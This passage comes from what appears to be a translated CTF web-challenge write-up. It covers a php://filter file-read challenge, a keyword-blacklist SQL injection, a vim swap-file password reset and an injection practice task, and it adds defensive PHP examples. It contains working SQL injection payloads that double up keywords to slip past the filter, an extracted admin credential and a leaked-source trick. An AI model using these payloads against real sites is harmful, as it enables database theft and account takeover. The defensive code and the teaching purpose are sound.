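    printf("%-46s %s\n", json_encode($u), login($db, $u, $p) ? 'logged in' : 'failure');
}
// "admin"                                        logged in
// "admin"                                        failure
// "admin' and 0=1 union select md5(123) -- -"    failure
// "nobody"                                       failure
```

With the statement prepared, the `and 0=1 union select md5(123)` trick has nowhere to go: there is no password column in the result that the client can populate, and even if there were, password_verify() against a bcrypt hash is not an md5 string comparison.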

Comprehensive challenge 2

Not an XSS challenge, but comments are welcome~
Link: get the flag

1. php://filter can be used
2. The file parameter is there to view source; file=about.php shows it directly

about.php source:

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<?php
$file=$_GET['file'];
if($file=="" || strstr($file,'config.php')){
    echo "file参数不能为空!";
    exit();
}
else{
    $cut=strchr($file,"loginxlcteam");
    if($cut==false){
        $data=file_get_contents($file);
        $date=htmlspecialchars($data);
        echo $date;
    }
    else{
        echo "<script>alert('敏感目录,禁止查看!但是。。。')</script>";
    }
}
1. strstr() finds the first occurrence of one string inside another and returns FALSE if it is not found.
2. strchr() is an alias of strstr().
3. (a): file=config.php, or an empty file, returns "file参数不能为空!"
   (b): file=loginxlcteam returns "敏感目录,禁止查看!但是。。。"
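Both file-serving scripts in this writeup, download.php under Download~! and the file= viewer in about.php here, pick what to read from a client-supplied name: one through an allowlist that itself contains the key file, the other by searching the name for "config.php" and "loginxlcteam", which says nothing about a wrapper like php://filter. As an added example written for this post (not the challenge's code), the version below selects downloads by opaque id and resolves viewer requests with realpath() against a base directory; the directory tree, file names and ids are constructed for the demo.

```php
<?php
// Added example, not the challenge's own code.  Two rules for serving a file
// the client chose:
//   1. downloads are selected by an opaque id, never by a (base64) file name,
//      and the map holds only the files meant for download;
//   2. a source viewer rejects stream wrappers and resolves the name against
//      its base directory with realpath(), instead of searching the string
//      for "config.php".
// All directories and files below are constructed for the demo (POSIX paths).

const DOWNLOADS = [                       // id => file inside the media directory
    'song1' => 'xingxingdiandeng.mp3',
    'song2' => 'buxiangzhangda.mp3',
];

function resolve_download(string $id, string $mediaDir): ?string
{
    if (!isset(DOWNLOADS[$id])) {
        return null;                      // unknown id: nothing to serve
    }
    $path = $mediaDir . '/' . DOWNLOADS[$id];
    return is_file($path) ? $path : null;
}

function resolve_viewable(string $requested, string $baseDir): ?string
{
    // NUL bytes and "scheme:" prefixes (php://, data:, phar://) never reach the filesystem.
    if (strpos($requested, "\0") !== false || preg_match('#^[a-z][a-z0-9+.-]*:#i', $requested)) {
        return null;
    }
    $base = realpath($baseDir);
    $real = realpath($baseDir . '/' . $requested);   // resolves any ".." components
    if ($base === false || $real === false || !is_file($real)) {
        return null;
    }
    // Containment: the resolved file must live below the base directory.
    if (strncmp($real, $base . '/', strlen($base) + 1) !== 0) {
        return null;
    }
    return $real;
}

// --- demo on a throwaway tree: <root>/public/{about.php,media/...} and <root>/config.php
$root   = sys_get_temp_dir() . '/pathdemo_' . bin2hex(random_bytes(4));
$public = $root . '/public';
mkdir($public . '/media', 0700, true);
file_put_contents($public . '/about.php', "<?php // about\n");
file_put_contents($public . '/media/xingxingdiandeng.mp3', 'mp3 bytes');
file_put_contents($root . '/config.php', "<?php // secret, outside public/\n");

$checks = [
    'download song1'         => resolve_download('song1', $public . '/media') !== null,          // served
    'download hereiskey.php' => resolve_download('hereiskey.php', $public . '/media') !== null,  // refused: not an id
    'view about.php'         => resolve_viewable('about.php', $public) !== null,                 // served
    'view ../config.php'     => resolve_viewable('../config.php', $public) !== null,             // refused: outside base
    'view php://filter/...'  => resolve_viewable('php://filter/resource=about.php', $public) !== null, // refused: wrapper
];
foreach ($checks as $label => $ok) {
    printf("%-24s %s\n", $label, $ok ? 'served' : 'refused');
}

// Clean up the throwaway tree.
foreach (["$public/media/xingxingdiandeng.mp3", "$public/about.php", "$root/config.php"] as $f) unlink($f);
foreach (["$public/media", $public, $root] as $d) rmdir($d);
```

The order matters: the wrapper and NUL checks run before realpath() because realpath() only understands filesystem paths, and the containment test compares against `$base . '/'` so that a sibling directory whose name merely starts with the base name is not accepted.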

1. The search box is SQL-injectable; use it to get the admin account and password
2. getshell


1. SQL injection
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> 
<html xmlns="http://www.w3.org/1999/xhtml"> 
<head> 
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> 
<title>搜索留言</title> 
</head> 
<body> 
<center> 
<div id="say" name="say" align="left" style="width:1024px"> 
<?php 
if($_SERVER['HTTP_USER_AGENT']!="Xlcteam Browser"){ 
echo '万恶滴黑阔,本功能只有用本公司开发的浏览器才可以用喔~'; 
exit(); 
} 
$id=$_POST['soid']; 
include 'config.php'; 
include 'antiinject.php'; 
include 'antixss.php'; 
$id=antiinject($id); 
$con = mysql_connect($db_address,$db_user,$db_pass) or die("不能连接到数据库!!".mysql_error()); 
mysql_select_db($db_name,$con); 
$id=mysql_real_escape_string($id); 
$result=mysql_query("SELECT * FROM `message` WHERE display=1 AND id=$id");
$rs=mysql_fetch_array($result); 
echo htmlspecialchars($rs['nice']).':<br />&nbsp;&nbsp;&nbsp;&nbsp;'.antixss($rs['say']).'<br />';
mysql_free_result($result); 
mysql_free_result($file); 
mysql_close($con); 
?> 
</div> 
</center> 
</body> 
</html>
<?php 
function antiinject($content){ 
$keyword=array("select","union","and","from",' ',"'",";",'"',"char","or","count","master","name","pass","admin","+","-","order","="); 
$info=strtolower($content); 
for($i=0;$i<=count($keyword);$i++){ 
$info=str_replace($keyword[$i], '',$info); 
} 
return $info; } 
?>
1. soid=2/**/oorroorrderder/**/by/**/4
2. soid=1/**/aandnd/**/1>2/**/uunionnion/**/sselectelect/**/1,2,3,4
或:soid=0/**/uunionnion/**/sselectelect/**/1,2,3,4
3. soid=1/**/aandnd/**/1>2/**/uunionnion/**/sselectelect/**/1,concat_ws(0x7c,id,usernnameame,userppassass),3,4/**/ffromrom/**/aadmindmin

Result: 1|admin|102 117 99 107 114 117 110 116 117
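Why the doubled keywords in the soid values above survive antiinject(): each keyword is stripped in a single non-recursive str_replace() pass, so removing the inner copy leaves the outer one intact. This is an added example written for this post, not the challenge's code: antiinject() is re-implemented with the page's keyword list, the page's own soid values are run through it, and a positive integer check is shown beside it. The list of inputs is taken from the steps above.

```php
<?php
// Added example, not the challenge's own code: the antiinject() blacklist
// from the message search, re-implemented with the same keyword list and the
// same single str_replace() pass, next to the positive check a numeric id needs.

// Same list and order as antiinject().  The original loops to count($keyword)
// inclusive, which reads one element past the end; foreach avoids that.
function strip_keywords(string $content): string
{
    $keyword = ["select","union","and","from",' ',"'",";",'"',"char","or","count",
                "master","name","pass","admin","+","-","order","="];
    $info = strtolower($content);
    foreach ($keyword as $k) {
        $info = str_replace($k, '', $info);   // one pass per keyword, never repeated
    }
    return $info;
}

// Positive validation: soid selects a row by numeric id, so accept only a
// canonical non-negative integer and nothing else.
function validate_id(string $content): ?int
{
    $v = filter_var($content, FILTER_VALIDATE_INT, ['options' => ['min_range' => 0]]);
    return $v === false ? null : $v;
}

// Inputs taken from the steps above.
$inputs = [
    '2',
    '2/**/oorroorrderder/**/by/**/4',
    '0/**/uunionnion/**/sselectelect/**/1,2,3,4',
];
foreach ($inputs as $in) {
    printf("%-44s -> after strip: %-36s validate_id: %s\n",
        $in, strip_keywords($in), var_export(validate_id($in), true));
}
// 2                                            -> after strip: 2                                    validate_id: 2
// 2/**/oorroorrderder/**/by/**/4               -> after strip: 2/**/order/**/by/**/4                validate_id: NULL
// 0/**/uunionnion/**/sselectelect/**/1,2,3,4   -> after strip: 0/**/union/**/select/**/1,2,3,4      validate_id: NULL
```

Tracing the second input: the "or" pass turns oorroorrderder into ororderder, and the later "order" pass turns that into order. A blacklist can only ever chase such rewrites; validating that soid is an integer, and then binding it as a parameter, leaves nothing to chase.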

2. Log in, getshell

Password reset 2

The challenge got solved in seconds, and I was not happy about it!
This challenge comes from CUMT
Challenge link: http://nctf.nuptzj.cn/web14/ (from the view-source dump below)

TIPS:
1. The admin's email can be found by looking around
2. On Linux, vi is generally used as the editor, and an abnormal exit leaves a backup (swap) file behind
3. Weak-type bypass


<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8" />  
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />  
<meta name="renderer" content="webkit" />  
<meta name="admin" content="admin@nuptzj.cn" />  
<meta name="editor" content="Vim" />  
<title>logic</title>  
<style type="text/css"> body,html{
            position: relative;
            height: 100%;
            width: 100%;
            padding: 0;
            margin: 0;
            background-color: #272822;
            color: #fff;
        }
        form{
            position: absolute;
            top: 50%;
            left: 50%;
            width: 400px;
            margin: -70px -200px;
        }
        form input{
            display: block;
            margin: 10px auto;
            width: 100%;
            border: none;
            height: 2rem;
            border-radius: 5px;
        }
</style>
</head>
<body>
<form action="submit.php" method="GET">
<h1>找回管理员密码</h1> email:<input name="emailAddress" type="text" />
</br> token:<input name="token" type="text" />
</br>  <input type="submit" value="提交">
</form>
</body>
</html>
1. http://nctf.nuptzj.cn/web14/.index.php.swp ---- Not Found
2. http://nctf.nuptzj.cn/web14/.submit.php.swp --- Success

........this line is omitted code........

/*
If the login email address is not the administrator's, die()
Database structure

--
-- Table structure for `user`
--

CREATE TABLE IF NOT EXISTS `user` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `username` varchar(255) NOT NULL,
  `email` varchar(255) NOT NULL,
  `token` int(255) NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`)
) ENGINE=MyISAM  DEFAULT CHARSET=utf8 AUTO_INCREMENT=2 ;

--
-- Dumping data for table `user`
--

INSERT INTO `user` (`id`, `username`, `email`, `token`) VALUES
(1, '****hidden***', '***hidden***', 0);
*/


........this line is omitted code........

if(!empty($token)&&!empty($emailAddress)){
    if(strlen($token)!=10) die('fail');
    if($token!='0') die('fail');
    $sql = "SELECT count(*) as num from `user` where token='$token' AND email='$emailAddress'";
    $r = mysql_query($sql) or die('db error');
    $r = mysql_fetch_assoc($r);
    $r = $r['num'];
    if($r>0){
        echo $flag;
    }else{
        echo "失败了呀";
    }
}

if(strlen($token)!=10) die('fail');
if($token!='0') die('fail');

Injection practice 1

Please use Firefox with the HackBar add-on installed (look it up and get familiar with it yourself)
Target URL: link
The flag is the administrator's password as a 32-character lowercase md5,
wrapped in nctf{}

The manual injection tutorial was posted in the group.
If you can't follow it, search for "mysql手动注入" (manual MySQL injection) and read up on it yourself

PS: if you did it with sqlmap or similar tools, don't have the nerve to submit
